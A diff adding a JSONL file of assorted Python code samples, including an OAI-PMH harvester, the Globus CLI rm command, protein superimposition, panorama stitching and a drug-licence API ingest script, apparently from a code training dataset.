diff --git "a/4446.jsonl" "b/4446.jsonl" new file mode 100644--- /dev/null +++ "b/4446.jsonl" @@ -0,0 +1,674 @@ +{"seq_id":"622796057","text":"import csv\nimport os\nimport requests\nimport sys\nimport time\nfrom tkinter import filedialog\nfrom tkinter import ttk\nfrom tkinter import *\nimport xmltodict\n\nsys.path.append('/Users/juliangautier/dataverse-scripts/dataverse_repository_curation_assistant')\nfrom dataverse_repository_curation_assistant_functions import *\n\n####################################################################################\n\n# Create GUI for getting user input\n\nwindow = Tk()\nwindow.title('Get record IDs in OAI-PMH feed')\nwindow.geometry('625x450') # width x height\n\n\n# Function called when Browse button is pressed\ndef retrieve_directory():\n global directory\n\n # Call the OS's file directory window and store selected object path as a global variable\n directory = filedialog.askdirectory()\n\n # Show user which directory she chose\n label_showChosenDirectory = Label(\n window, text='You chose: ' + directory, anchor='w', \n foreground='green', wraplength=500, justify='left')\n label_showChosenDirectory.grid(sticky='w', column=0, row=14, padx=20)\n\n\n# Function called when Start button is pressed\ndef retrieve_input():\n global baseUrl\n global oaiSet\n\n # Store what's entered in dataverseUrl text box as a global variable\n baseUrl = entry_baseUrl.get().strip()\n\n # Store what's entered in dataverseUrl text box as a global variable\n oaiSet = entry_oaiSet.get().strip()\n\n if baseUrl:\n window.destroy()\n\n # If no baseUrl is entered, display message that one is required\n else:\n print('A dataverse URL is required')\n label_baseUrlReqiured = Label(\n window, text='The repository\\'s OAI-PMH URL is required.', \n foreground='red', anchor='w')\n label_baseUrlReqiured.grid(sticky='w', column=0, row=3, padx=20)\n\n\n# Create label for BaseUrl field\nlabel_baseUrl = Label(window, text='OAI-PMH Base URL:', anchor='w')\nlabel_baseUrl.grid(sticky='w', column=0, row=0, padx=20)\n\n# Create Base URL field\ndataverseUrl = str()\nentry_baseUrl = Entry(window, width=50, textvariable=dataverseUrl)\nentry_baseUrl.grid(sticky='w', column=0, row=1, pady=2, padx=20)\n\n# Create help text for BaseUrl field\nlabel_dataverseUrlHelpText = Label(\n window, text='Example: https://demo.dataverse.org/oai', \n foreground='grey', anchor='w')\nlabel_dataverseUrlHelpText.grid(sticky='w', column=0, row=2, padx=20)\n\n# Create empty row in grid to improve spacing between the two fields\nwindow.grid_rowconfigure(4, minsize=25)\n\n# Create label for oaiSet key field\nlabel_oaiSet = Label(window, text='OAI set name:', anchor='w')\nlabel_oaiSet.grid(sticky='w', column=0, row=8, padx=20)\n\n# Create oaiSet field\noaiSet = str()\nentry_oaiSet = Entry(window, width=50, textvariable=oaiSet)\nentry_oaiSet.grid(sticky='w', column=0, row=9, pady=2, padx=20)\n\n# Create help text for oaiSet field\nlabel_oaiSetHelpText = Label(\n window, text='If no OAI Set is entered, all records in the repository\\'s OAI-PMH feed will be retrived', \n foreground='grey', anchor='w')\nlabel_oaiSetHelpText.grid(sticky='w', column=0, row=10, padx=20)\n\n# Create empty row in grid to improve spacing between the two fields\nwindow.grid_rowconfigure(11, minsize=25)\n\n# Create label for Browse directory button\nlabel_browseDirectory = Label(\n window, \n text='Choose folder to store CSV file with identifiers and statuses of harvested records:', \n anchor='w')\nlabel_browseDirectory.grid(sticky='w', column=0, row=12, pady=2, padx=20)\n\n# Create Browse directory button\nbutton_browseDirectory = ttk.Button(\n window, text='Browse', command=lambda: retrieve_directory())\nbutton_browseDirectory.grid(sticky='w', column=0, row=13, padx=20)\n\n# Create start button\nbutton_Submit = ttk.Button(\n window, text='Start', command=lambda: retrieve_input())\nbutton_Submit.grid(sticky='w', column=0, row=15, pady=40, padx=20)\n\n# Keep window open until it's closed\nmainloop()\n\n\ncurrentTime = time.strftime('%Y.%m.%d_%H.%M.%S')\nmetadataPrefix = 'oai_dc'\n\nif oaiSet:\n oaiUrl = f'{baseUrl}?verb=ListIdentifiers&set={oaiSet}&metadataPrefix={metadataPrefix}'\nelse:\n oaiSet = 'no_set'\n oaiUrl = f'{baseUrl}?verb=ListIdentifiers&metadataPrefix={metadataPrefix}'\n\ncsvFile = f'harvested_records_{oaiSet}_{currentTime}.csv'\ncsvFilePath = os.path.join(directory, csvFile)\n\nprint('Counting current and deleted records:')\n\nresponse = requests.get(oaiUrl)\ndictData = xmltodict.parse(response.content)\n\nrecordCount = 0\ndeletedRecordCount = 0\n\nwith open(csvFilePath, mode='w', encoding='utf-8', newline='') as f:\n f = csv.writer(f, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n f.writerow(['record_identifier', 'record_status', 'data_stamp'])\n\n if 'resumptionToken' not in dictData['OAI-PMH']['ListIdentifiers']:\n for record in dictData['OAI-PMH']['ListIdentifiers']['header']:\n recordIdentifier = record['identifier']\n dateStamp = record['datestamp']\n recordStatus = record.get('@status')\n if recordStatus != 'deleted':\n recordStatus = 'present'\n recordCount += 1\n elif recordStatus == 'deleted':\n recordStatus = 'deleted'\n deletedRecordCount +=1\n\n f.writerow([recordIdentifier, recordStatus, dateStamp])\n\n print(f'Record count in {oaiSet} set: {recordCount}')\n print(f'Count of deleted records: {deletedRecordCount}')\n\n elif 'resumptionToken' in dictData['OAI-PMH']['ListIdentifiers']:\n pageCount = 1\n print(f'Counting records in page {pageCount}', end='\\r', flush=True)\n\n resumptionToken = improved_get(dictData, 'OAI-PMH.ListIdentifiers.resumptionToken.#text')\n\n for record in dictData['OAI-PMH']['ListIdentifiers']['header']:\n recordIdentifier = record['identifier']\n dateStamp = record['datestamp']\n recordStatus = record.get('@status')\n if recordStatus != 'deleted':\n recordStatus = 'present'\n recordCount += 1\n elif recordStatus == 'deleted':\n recordStatus = 'deleted'\n deletedRecordCount +=1\n\n f.writerow([recordIdentifier, recordStatus, dateStamp])\n\n resumptionToken = improved_get(dictData, 'OAI-PMH.ListIdentifiers.resumptionToken.#text')\n\n while resumptionToken is not None:\n pageCount += 1\n print(f'Counting records in page {pageCount}', end='\\r', flush=True)\n\n oaiUrlResume = f'{baseUrl}?verb=ListIdentifiers&resumptionToken={resumptionToken}'\n response = requests.get(oaiUrlResume)\n dictData = xmltodict.parse(response.content)\n\n for record in dictData['OAI-PMH']['ListIdentifiers']['header']:\n recordIdentifier = record['identifier']\n dateStamp = record['datestamp']\n recordStatus = record.get('@status')\n if recordStatus != 'deleted':\n recordStatus = 'present'\n recordCount += 1\n elif recordStatus == 'deleted':\n recordStatus = 'deleted'\n deletedRecordCount +=1\n\n f.writerow([recordIdentifier, recordStatus, dateStamp])\n\n resumptionToken = improved_get(dictData, 'OAI-PMH.ListIdentifiers.resumptionToken.#text')\n\n if oaiSet != 'no_set':\n print(f'\\nRecord count in {oaiSet} set: {recordCount}')\n else:\n print(f'\\nRecord count: {recordCount}')\n print(f'Count of deleted records: {deletedRecordCount}')\n print(f'Record identifiers saved to {csvFilePath}')\n","sub_path":"other_scripts/get_oaipmh_records.py","file_name":"get_oaipmh_records.py","file_ext":"py","file_size_in_byte":7612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"16976277","text":"from linked_queue import LinkedQueue\n\n\ndef stack_to_queue(stack):\n \"\"\"\n :param stack: stack to convert into queue\n :return: queue representation of stack\n \"\"\"\n queue = LinkedQueue()\n temp_list = []\n for item in stack:\n temp_list.append(item)\n temp_list.reverse()\n for item in temp_list:\n queue.enqueue(item)\n return queue\n","sub_path":"stack_to_queue.py","file_name":"stack_to_queue.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"307303437","text":"# Copyright (c) 2018-2020, NVIDIA CORPORATION.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport cugraph.dask as dcg\nfrom dask.distributed import Client\nimport gc\nimport cugraph\nimport dask_cudf\nimport cugraph.comms as Comms\nfrom dask_cuda import LocalCUDACluster\nimport pytest\n\n\n@pytest.fixture\ndef client_connection():\n cluster = LocalCUDACluster()\n client = Client(cluster)\n Comms.initialize()\n\n yield client\n\n Comms.destroy()\n client.close()\n cluster.close()\n\n\ndef test_compute_local_data(client_connection):\n\n gc.collect()\n\n input_data_path = r\"../datasets/karate.csv\"\n chunksize = dcg.get_chunksize(input_data_path)\n ddf = dask_cudf.read_csv(input_data_path, chunksize=chunksize,\n delimiter=' ',\n names=['src', 'dst', 'value'],\n dtype=['int32', 'int32', 'float32'])\n\n dg = cugraph.DiGraph()\n dg.from_dask_cudf_edgelist(ddf, source='src', destination='dst',\n edge_attr='value')\n\n # Compute_local_data\n dg.compute_local_data(by='dst')\n data = dg.local_data['data']\n by = dg.local_data['by']\n\n assert by == 'dst'\n assert Comms.is_initialized()\n\n global_num_edges = data.local_data['edges'].sum()\n assert global_num_edges == dg.number_of_edges()\n global_num_verts = data.local_data['verts'].sum()\n assert global_num_verts == dg.number_of_nodes()\n","sub_path":"python/cugraph/tests/dask/test_mg_utility.py","file_name":"test_mg_utility.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"100050736","text":"import click\n\nfrom globus_sdk import DeleteData\n\n\nfrom globus_cli.parsing import (\n common_options, task_submission_options, ENDPOINT_PLUS_REQPATH,\n delete_and_rm_options, synchronous_task_wait_options)\nfrom globus_cli.safeio import (\n safeprint, formatted_print,\n err_is_terminal, term_is_interactive)\n\nfrom globus_cli.services.transfer import (\n get_client, autoactivate, task_wait_with_io)\n\n\n@click.command(\n \"rm\", short_help=\"Delete a single path; wait for it to complete\",\n help=(\"Submit a Delete Task to delete a single path, \"\n \"and then block and wait for it to complete. \"\n \"Output is similar to 'globus task wait'\"))\n@common_options\n@task_submission_options\n@delete_and_rm_options(supports_batch=False, default_enable_globs=True)\n@synchronous_task_wait_options\n@click.argument('endpoint_plus_path', metavar=ENDPOINT_PLUS_REQPATH.metavar,\n type=ENDPOINT_PLUS_REQPATH)\ndef rm_command(ignore_missing, star_silent, recursive, enable_globs,\n endpoint_plus_path, label, submission_id, dry_run, deadline,\n skip_activation_check, notify,\n meow, heartbeat, polling_interval, timeout):\n \"\"\"\n Executor for `globus rm`\n \"\"\"\n endpoint_id, path = endpoint_plus_path\n\n client = get_client()\n\n # attempt to activate unless --skip-activation-check is given\n if not skip_activation_check:\n autoactivate(client, endpoint_id, if_expires_in=60)\n\n delete_data = DeleteData(client, endpoint_id,\n label=label,\n recursive=recursive,\n ignore_missing=ignore_missing,\n submission_id=submission_id,\n deadline=deadline,\n skip_activation_check=skip_activation_check,\n interpret_globs=enable_globs,\n **notify)\n\n if not star_silent and enable_globs and path.endswith('*'):\n # not intuitive, but `click.confirm(abort=True)` prints to stdout\n # unnecessarily, which we don't really want...\n # only do this check if stderr is a pty\n if (err_is_terminal() and\n term_is_interactive() and\n not click.confirm(\n 'Are you sure you want to delete all files matching \"{}\"?'\n .format(path), err=True)):\n safeprint('Aborted.', write_to_stderr=True)\n click.get_current_context().exit(1)\n delete_data.add_item(path)\n\n if dry_run:\n formatted_print(delete_data, response_key='DATA',\n fields=[('Path', 'path')])\n # exit safely\n return\n\n # Print task submission to stderr so that `-Fjson` is still correctly\n # respected, as it will be by `task wait`\n res = client.submit_delete(delete_data)\n task_id = res['task_id']\n safeprint('Delete task submitted under ID \"{}\"'.format(task_id),\n write_to_stderr=True)\n\n # do a `task wait` equivalent, including printing and correct exit status\n task_wait_with_io(meow, heartbeat, polling_interval, timeout, task_id,\n client=client)\n","sub_path":"globus_cli/commands/rm.py","file_name":"rm.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"531382631","text":"# 바둑이 승차\nimport sys\nfrom collections import deque\nsys.stdin = open(\"input.txt\", \"r\")\n\ndef DFS(L, sum, tsum):\n global result\n\n # 시간복잡도 줄이기위해 조건 추가하는것이 중요하다.\n # 어떤 조건을 넣을지 고민해야함\n if sum + (total - tsum) < result:\n return\n\n if sum > c:\n return \n\n if L == n:\n if sum > result:\n result =sum\n else:\n DFS(L + 1, sum + a[L], tsum + a[L])\n DFS(L + 1, sum, tsum + a[L])\n\nif __name__ == \"__main__\":\n c, n = map(int, input().split())\n a = [0]*n\n result = -214700000\n \n for i in range(n):\n a[i] = int(input())\n\n total = sum(a)\n \n DFS(0, 0, 0)\n print(result)\n\n\n\"\"\"\n바둑이 승차(DFS)\n철수는 그의 바둑이들을 데리��� 시장에 가려고 한다. 그런데 그의 트럭은 C킬로그램 넘게 태\n울수가 없다. 철수는 C를 넘지 않으면서 그의 바둑이들을 가장 무겁게 태우고 싶다.\nN마리의 바둑이와 각 바둑이의 무게 W가 주어지면, 철수가 트럭에 태울 수 있는 가장 무거운\n무게를 구하는 프로그램을 작성하세요.\n▣ 입력설명\n첫 번째 줄에 자연수 C(1<=C<=100,000,000)와 N(1<=N<=30)이 주어집니다.\n둘째 줄부터 N마리 바둑이의 무게가 주어진다.\n▣ 출력설명\n첫 번째 줄에 가장 무거운 무게를 출력한다.\n▣ 입력예제 1\n259 5\n81\n58\n42\n33\n61\n▣ 출력예제 1\n242\n\"\"\"","sub_path":"바둑이 승차.py","file_name":"바둑이 승차.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143023836","text":"\n# ***** Superimpose two protein structures *****\n# adapted code from MMTK\n\nimport numpy as np\n\n\n# atoms_coord :: 2D numpy.ndarray\n# mass :: 1D numpy.ndarray\n\n\ndef center_of_mass(atoms_coord:np.ndarray, mass:np.ndarray) -> np.ndarray:\n return sum(atoms_coord * mass[:, np.newaxis])/sum(mass)\n\n\ndef rotation(v):\n rot = quaternion_rot()\n return np.dot(np.dot(rot, v), v)\n\n\ndef quaternion_rot():\n _rot = np.zeros((3,3,4,4))\n _rot[0,0, 0,0] = 1\n _rot[0,0, 1,1] = 1\n _rot[0,0, 2,2] = -1\n _rot[0,0, 3,3] = -1\n _rot[1,1, 0,0] = 1\n _rot[1,1, 1,1] = -1\n _rot[1,1, 2,2] = 1\n _rot[1,1, 3,3] = -1\n _rot[2,2, 0,0] = 1\n _rot[2,2, 1,1] = -1\n _rot[2,2, 2,2] = -1\n _rot[2,2, 3,3] = 1\n _rot[0,1, 1,2] = 2\n _rot[0,1, 0,3] = -2\n _rot[0,2, 0,2] = 2\n _rot[0,2, 1,3] = 2\n _rot[1,0, 0,3] = 2\n _rot[1,0, 1,2] = 2\n _rot[1,2, 0,1] = -2\n _rot[1,2, 2,3] = 2\n _rot[2,0, 0,2] = -2\n _rot[2,0, 1,3] = 2\n _rot[2,1, 0,1] = 2\n _rot[2,1, 2,3] = 2\n \n return _rot \n\n\ndef calc_trans(P:np.ndarray, Q:np.ndarray, mass:np.ndarray = None):\n '''\n Calculate the transformation matrix that can be applied to Q to\n get the minimum (mass-weighted, if mass != None) RMS against P\n '''\n if mass is None:\n mass = np.full(len(P),1)\n \n N = len(mass)\n mass_w = mass / sum(mass)\n \n ref_cms = center_of_mass(Q, mass)\n Q_ref = Q - ref_cms\n\n pos = sum(P * mass_w[:, np.newaxis])\n possq = sum(sum((P**2 + Q_ref**2) * mass_w[:, np.newaxis]))\n cross = (mass_w[:, np.newaxis] * P).transpose() @ Q_ref\n\n k = np.zeros((4, 4))\n k[0, 0] = -cross[0, 0]-cross[1, 1]-cross[2, 2]\n k[0, 1] = cross[1, 2]-cross[2, 1]\n k[0, 2] = cross[2, 0]-cross[0, 2]\n k[0, 3] = cross[0, 1]-cross[1, 0]\n k[1, 1] = -cross[0, 0]+cross[1, 1]+cross[2, 2]\n k[1, 2] = -cross[0, 1]-cross[1, 0]\n k[1, 3] = -cross[0, 2]-cross[2, 0]\n k[2, 2] = cross[0, 0]-cross[1, 1]+cross[2, 2]\n k[2, 3] = -cross[1, 2]-cross[2, 1]\n k[3, 3] = cross[0, 0]+cross[1, 1]-cross[2, 2]\n\n for i in range(1, 4):\n for j in range(i):\n k[i, j] = k[j, i]\n k = 2.*k\n for i in range(4):\n k[i, i] = k[i, i] + possq - sum(pos*pos)\n e, v = np.linalg.eigh(k) # eigenvalues are in ascending order \n v = v[:,0] # minimum eigenvalue's vector\n if v[0] < 0: v = -v\n if e[0] <= 0.:\n rms = 0.\n else:\n rms = np.sqrt(e[0])\n rot_tensor = rotation(v)\n trans_vector = rot_tensor @ (-ref_cms) + pos\n return (rot_tensor, trans_vector), rms\n\n\n\ndef apply_trans(rot, trans, Q):\n return Q @ rot.transpose() + trans\n\n","sub_path":"utils/superimpose.py","file_name":"superimpose.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"489023882","text":"import argparse\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nnumber_of_matches=25\nrev=0\n\ndef resize(image,scale_percent=50):\n#calculate the scale_percent of original dimensions\n width = int(image.shape[1] * scale_percent / 100)\n height = int(image.shape[0] * scale_percent / 100)\n dsize = (width, height)\n output = cv.resize(image, dsize)\n return output\n\ndef pad_with(vector, pad_width, iaxis, kwargs):\n pad_value = kwargs.get('padder', 10)\n vector[:pad_width[0]] = pad_value\n vector[-pad_width[1]:] = pad_value\n\ndef remove_unwanted_black(output):\n '''Removes unwanted blank space from an image and crops it to the smallest rectangle which fits all the nonzero pixel'''\n shape=output.shape\n output=output.astype(\"uint8\")\n if len(shape)>=3:\n gray = cv.cvtColor(output, cv.COLOR_BGR2GRAY)\n else:\n gray=output\n sum_along_row=np.sum(gray,axis=1)\n sum_along_col=np.sum(gray,axis=0)\n sum_along_row=np.append(sum_along_row,0)\n sum_along_col=np.append(sum_along_col,0)\n for i in range(len(sum_along_col)):\n if sum_along_col[i]!=0:\n c1=i\n break\n for i in range(len(sum_along_col)-1,-1,-1):\n if sum_along_col[i]!=0:\n c2=i\n break\n for i in range(len(sum_along_row)):\n if sum_along_row[i]!=0:\n r1=i\n break\n for i in range(len(sum_along_row)-1,-1,-1):\n if sum_along_row[i]!=0:\n r2=i\n break\n final_out=output[r1:r2+1,c1:c2+1,:]\n final_out=np.array(final_out,dtype=\"uint8\")\n return final_out\n\ndef stitch_to_left(img1,img2):\n '''Takes the left image (img1) as reference and stiches the right image (img2) to the reference image'''\n descriptor = cv.ORB_create()\n keypoints=[]\n features_list=[]\n (kps, features) = descriptor.detectAndCompute(img1, None)\n keypoints.append(kps)\n features_list.append(features)\n (kps, features) = descriptor.detectAndCompute(img2, None)\n keypoints.append(kps)\n features_list.append(features)\n bf = cv.BFMatcher(cv.NORM_HAMMING, crossCheck=True)\n best_matches = bf.match(features_list[0],features_list[1])\n rawMatches = sorted(best_matches, key = lambda x:x.distance)\n matches=rawMatches[:number_of_matches]\n img3 = cv.drawMatches(img1,keypoints[0],img2,keypoints[1],matches,\n None,flags=cv.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)\n if len(matches) >= 4:\n src = np.float32([ keypoints[0][m.queryIdx].pt for m in matches]).reshape(-1,1,2)\n dst = np.float32([ keypoints[1][m.trainIdx].pt for m in matches]).reshape(-1,1,2)\n H, masked = cv.findHomography(dst, src, cv.RANSAC, 5.0)\n width = img1.shape[1] + img2.shape[1]\n height = img1.shape[0] + img2.shape[0]\n result = cv.warpPerspective(img2,H, (width, height))\n mask=(img1<1)*1\n result[0:img1.shape[0], 0:img1.shape[1]] =result[0:img1.shape[0], 0:img1.shape[1]]*mask+img1\n return result\n\ndef stitch_to_right(img1,img2):\n '''Takes the right image (img2) as reference and stiches the left image (img1) to the reference image'''\n return cv.flip(stitch_to_left(cv.flip(img1,1),cv.flip(img2,1)),1)\n\nif __name__=='__main__':\n my_parser = argparse.ArgumentParser()\n my_parser.add_argument('Path',metavar='path',type=str,default='..\\data\\general\\mountain',help='..\\data\\general\\mountain')\n my_parser.add_argument('index',metavar='index',type=int,default=1,help='give index')\n args = my_parser.parse_args()\n mypath=args.Path\n mypath=mypath.rstrip()\n temp=mypath.split(\"\\\\\")\n if temp[-2]==\"campus\" or temp[-2]==\"yard\":\n rev=1\n if temp[-2]==\"ledge\" or temp[-2]==\"campus\":\n number_of_matches=20\n if temp[-2]==\"yosemite\":\n number_of_matches=9\n n=args.index\n n=n-1\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath,f))]\n images = np.empty(len(onlyfiles), dtype=object)\n for i in range(0, len(onlyfiles)):\n images[i] = cv.imread( join(mypath,onlyfiles[i]))\n if rev==1:\n images=images[::-1]\n for i in range(n,n+1):\n r=images[n] #reference image\n # cv.imshow(\"ref img\",r)\n r=cv.copyMakeBorder(r, r.shape[0]//8, r.shape[0]//8, r.shape[1]//8, r.shape[1]//8, cv.BORDER_CONSTANT, None, 0)\n # cv.imshow(\"padded ref img\",r)\n # stitching images that are to the right of the reference image (homography to the left)\n for i in range(n+1,len(images)):\n r=stitch_to_left(r,images[i])\n r=remove_unwanted_black(r)\n\n #stitching images that are to the left of the reference image (homograpy to the right)\n for i in range(n-1,-1,-1):\n r=stitch_to_right(r,images[i])\n r=remove_unwanted_black(r)\n\n\n cv.imshow(\"final stitched\",resize(remove_unwanted_black(r),40))\n # cv.imshow(\"final stitched w black\",resize(r,50))\n cv.waitKey(0)\n cv.destroyAllWindows()\n mypath=mypath.rstrip()\n temp=mypath.split(\"\\\\\")\n # print(temp[-2])\n path_save=\"..\\\\results\\pano-general-results\\\\\"\n # if rev==1:\n # print('{}_ref={}_matches={}_rev.jpg'.format(temp[-2],n+1,number_of_matches))\n # cv.imwrite(join(path_save , '{}_ref={}_matches={}_rev.jpg'.format(temp[-2],n+1,number_of_matches)), r)\n # else:\n # print('{}_ref={}_matches={}.jpg'.format(temp[-2],n+1,number_of_matches))\n # cv.imwrite(join(path_save , '{}_ref={}_matches={}.jpg'.format(temp[-2],n+1,number_of_matches)), r)\n","sub_path":"183079009_193079014_19307R003_lab04_pano/code/pano-general.py","file_name":"pano-general.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"209081781","text":"## NOC API daily ingest for new generics and respective CRP##\r\n### Appends to end of the file on a flat JSON structure ###\r\nimport os\r\nimport json\r\nimport requests\r\nfrom datetime import datetime\r\n\r\ntoday = datetime.today().strftime('%Y-%m-%d')\r\nbase_url = \"https://node.hres.ca\"\r\nsub_url = \"/drug/licence?\"\r\nsbydate = \"search=noc_date:{}\".format(today)\r\nlimit = \"&limit=50\" #Assuming no more than 50 NOCs issued per day. Current Node.hres.ca query limit is 1000.\r\nhits = 0\r\nmiss_hits = 0\r\n\t\r\nr = requests.get(base_url+sub_url+sbydate+limit)\r\n\r\nif r.status_code == 200:\r\n\tdata = json.loads(r.text)\r\n\tdata = data['results']\r\n\tfor noc in data:\r\n\t\thits+=1\r\n\t\tif noc['_source'].get('drug_identification_numbers') != None and noc['_source'].get('noc_crp_product_name') != None:\r\n\t\t\ttry:\r\n\t\t\t\tcrp_name = noc['_source']['noc_crp_product_name']\r\n\t\t\t\tcrp_company = noc['_source']['noc_crp_company_name']\r\n\t\t\t\tnoc_date = noc['_source']['noc_date']\r\n\t\t\t\tgeneric_company = noc['_source']['noc_manufacturer_name']\r\n\t\t\t\tingredients = noc['_source']['ingredients']\r\n\t\t\t\t\r\n\t\t\t\tfor product in noc['_source']['drug_products']:\r\n\t\t\t\t\tgeneric_product = product['brandname']\r\n\t\t\t\t\tingredients_extra = product['ingredients']\r\n\t\t\t\t\tdosage_form = product['forms']\r\n\t\t\t\t\troute_of_administration = product['routes']\r\n\t\t\t\t\tdin = product['drug_identification_number']\r\n\t\t\t\t\r\n\t\t\t\t\tgeneric = {'din':din,\r\n\t\t\t\t\t\t\t 'generic_product':generic_product,\r\n\t\t\t\t\t\t\t 'generic_company':generic_company,\r\n\t\t\t\t\t\t\t 'crp_name':crp_name,\r\n\t\t\t\t\t\t\t 'crp_company':crp_company,\r\n\t\t\t\t\t\t\t 'ingredients':ingredients,\r\n\t\t\t\t\t\t\t 'ingredients_extra':ingredients_extra,\r\n\t\t\t\t\t\t\t 'dosage_form':dosage_form,\r\n\t\t\t\t\t\t\t 'route_of_administration':route_of_administration,\r\n\t\t\t\t\t\t\t 'noc_date':noc_date}\r\n\t\t\t\t\r\n\t\t\t\t\twith open('new_generics.json','r+') as f: \r\n\t\t\t\t\t\tf.seek(0,2)\r\n\t\t\t\t\t\tf.seek(f.tell()-1,os.SEEK_SET)\r\n\t\t\t\t\t\tf.write(',')\r\n\t\t\t\t\t\tjson.dump(generic, f)\r\n\t\t\t\t\t\tf.write(']')\r\n\t\t\t\t\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint(\"Error on id {}\\n{}\".format(noc['_id'],e))\r\n\t\telse:\r\n\t\t\tmiss_hits+=1\r\n\r\n\tprint(\"Found {} new generic drugs out of total {} NOCs today (dated {})\".format(hits-miss_hits,hits,today))\r\nelse:\r\n\tprint(\"Connection HTTP error {}\".format(r.status_code))\r\n","sub_path":"noc/Node_NOC.py","file_name":"Node_NOC.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"462309562","text":"#!/usr/bin/env python3\n\nimport pytator\nimport argparse\nimport progressbar\nimport sys\n\nif __name__==\"__main__\":\n # Create a standard arg parse and add pytator args\n parser = argparse.ArgumentParser(description=\"Find missing extractions\")\n parser = pytator.tator.cli_parser(parser)\n parser.add_argument(\"--section\", required=True, help=\"Section Name\")\n parser.add_argument(\"--algo\", required=True)\n parser.add_argument(\"--submit-max\", default=500, type=int)\n\n args = parser.parse_args()\n tator = pytator.Tator(args.url, args.token, args.project)\n\n # hardcode for now\n count = 12180\n medias = tator.Media.filter({#\"attribute\":\n #f\"tator_user_sections::{args.section}\",\n \"type\": 8}) #hardcode\n print(\"Fetched Media\")\n sys.exit(0)\n count=len(medias)\n media_batch=[]\n for media in progressbar.progressbar(medias):\n media_batch.append(str(media['id']))\n if len(media_batch) == args.submit_max:\n temp_str=\",\".join(media_batch)\n tator.Algorithm.launch_on_medias(args.algo, temp_str)\n media_batch=[]\n \n if len(media_batch) > 0:\n temp_str=\",\".join(media_batch)\n tator.Algorithm.launch_on_medias(args.algo, temp_str)\n","sub_path":"scripts/packages/pytator/examples/launch_algo.py","file_name":"launch_algo.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"437555720","text":"import urllib.request\r\nimport re\r\n\r\nurl = 'http://www.pythonchallenge.com/pc/def/linkedlist.php?nothing='\r\n\r\n\r\ndef end_of_nothing():\r\n\ta = ['12345']\r\n\r\n\tfor i in range(251):\r\n\t\twith urllib.request.urlopen(url + a[i]) as f:\r\n\t\t\ts = f.read().decode('utf-8')\t#we need to decode because f.read() is a byte object\r\n\r\n\t\tif s == \"Yes. Divide by two and keep going.\":\r\n\t\t\ts = [str(int(a[-1])/2)]\r\n\t\t\tprint(s)\r\n\t\telse:\r\n\t\t\ts = re.findall(r'-?\\d+\\.?\\d*', s)\r\n\t\ta += s\r\n\t\tprint(i, s)\r\n\treturn s\r\n\r\nlast_number = end_of_nothing()\r\n\r\nwith urllib.request.urlopen(url + last_number[0]) as f:\r\n\ts = f.read().decode('utf-8')\r\nprint(s)\r\n","sub_path":"04/pyc04.py","file_name":"pyc04.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"194274982","text":"import argparse\nimport os\nimport time\nimport math\nimport numpy as np\nimport random\nimport sys\nimport shutil\nimport json\nimport string\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nimport run_cad\nfrom utils import *\nfrom models import Seq2Seq, MLP_D, MLP_G\n\nfrom regularizer import score_penalty, gradient_penalty\n\nclass EnergyLoss(torch.nn.Module):\n\n def __init__(self):\n super(EnergyLoss, self).__init__()\n\n def forward(self, energy_pos, energy_neg, l2_reg=False, margin=1.0, objective=\"softplus\"):\n temp = 1.0\n ml_coeff = 1.0\n l2_coeff = 1.0\n if objective == 'logsumexp':\n energy_neg_reduced = (energy_neg - energy_neg.min())\n coeff = torch.exp(-temp * energy_neg_reduced)\n norm_constant = coeff.sum() + 1e-4\n pos_loss = torch.mean(temp * energy_pos)\n neg_loss = coeff * (-1 * temp * energy_neg) / norm_constant\n loss_ml = ml_coeff * (pos_loss + neg_loss.sum())\n elif objective == 'cd':\n pos_loss = torch.mean(temp * energy_pos)\n neg_loss = -torch.mean(temp * energy_neg)\n loss_ml = ml_coeff * (pos_loss + torch.sum(neg_loss))\n elif objective == 'softplus':\n softplus = torch.nn.Softplus()\n loss_ml = ml_coeff * softplus(temp * (energy_pos - energy_neg))\n\n loss_total = torch.mean(loss_ml)\n if l2_reg:\n loss_total = loss_total + \\\n l2_coeff * (torch.mean(torch.pow(energy_pos, 2))\n + torch.mean(torch.pow(energy_neg, 2)))\n\n return loss_total\n\n\nargs = run_cad.load_cadgan_args()\nlogger = init_logger(os.path.join(args.save, \"exp_log.txt\"))\n\n# Set the random seed manually for reproducibility.\nrandom.seed(args.seed) 